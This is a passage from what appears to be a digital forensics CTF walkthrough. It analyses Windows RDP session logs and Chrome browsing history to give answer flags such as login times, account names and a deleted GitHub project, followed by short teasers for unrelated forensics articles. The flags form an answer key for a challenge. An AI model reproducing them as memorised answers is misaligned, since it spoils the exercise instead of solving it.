What was the system time of the first login by the attacker? [UTC timestamp in the “YYYY-MM-DD hh:mm:ss” format]

To solve this, you need to analyze Windows Event Logs again, this time Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx. We already know that the host was compromised on 04/26/2018 16:01:39 (UTC), so let's start from that date and time. We see a few RDP logons and logoffs from 71.229.178.80, but then, at 04/26/2018 18:16:29 (UTC), a logon from 47.189.34.73:

So, the flag is 2018-04-26 18:16:29.

Gemini

What was the second account the attacker logged into?

So, according to the same log file, the host was accessed via RDP with the itsupport user account too, but for some reason the flag is maxpowers.

After Exfil

What was the last website the attacker went to after logging in as Max Powers for the last time?

Let's look at browsing history, for example at the History file located under C:\Users\maxpowers\AppData\Local\Google\Chrome\User Data\Default\:

As you can see, the last record is https://github.com/mpower4nsic/ProjectE/settings/delete, and the flag is https://github.com.

What happened to project e?

What was the last thing that happened to Project E after the attacker logged into Max Powers github?

Let's look at browsing history again: Project E was deleted.

That's all! The CTF is solved! Thanks for reading!

Happy forensicating!

About the authors

Oleg Skulkin, GCFA, MCFE, ACE, is a DFIR enthusional (enthusiast + professional), Windows Forensics Cookbook and Practical Mobile Forensics co-author.

Igor Mikhaylov, MCFE, EnCE, ACE, OSFCE, is a digital forensic examiner with more than 20 years of experience and Mobile Forensics Cookbook author.

Secret Office 365 Activities API

This is a quick look at the recently revealed “activities” API within Office 365. This undocumented interface provides investigators with a wealth of detailed information that was previously believed to be unavailable. It appears to work with all Office 365 enterprise plans, and requires no action to enable.

Whitepaper: Acquiring and Parsing Data from iOS 11 Devices

Over its last few releases, Apple’s iOS—the operating system running on iPhones, iPads, and other mobile devices—has steadily enhanced its offerings designed for both security and user convenience. Each sub-version of both iOS 10 and 11 added or changed small features that have drastically changed the forensic workflow.

In this paper, we’ll describe how to:

  • Access more evidentiary data with new acquisition methods and tools, including GrayKey, biometric authentication, and even encrypted backups that you can create yourself.
  • Look for data stored in new or different .plist and SQLite database locations, as well as entirely new datasets including .plists associated with the Do Not Disturb While Driving feature.
  • Understand artifact changes, such as the new nanosecond timestamp format, Safari browser history, and new high efficiency photo and video file formats, that might affect how your forensic tool parses data.

Security Event Logging and Monitoring Techniques for Incident Response in Hadoop

This presentation shares some of the techniques and lessons learned from a real-world Hadoop implementation at Johns Hopkins. Data is sanitized as expected, but the focus is on the strategies and techniques used to collect and monitor audit and access log events from key Hadoop services and forward them to a central server for monitoring, analysis, and response to any suspected breaches or incidents. Automation techniques, such as Ansible scripts to install agents or forwarders uniformly and efficiently across the cluster nodes, are also highlighted where appropriate.
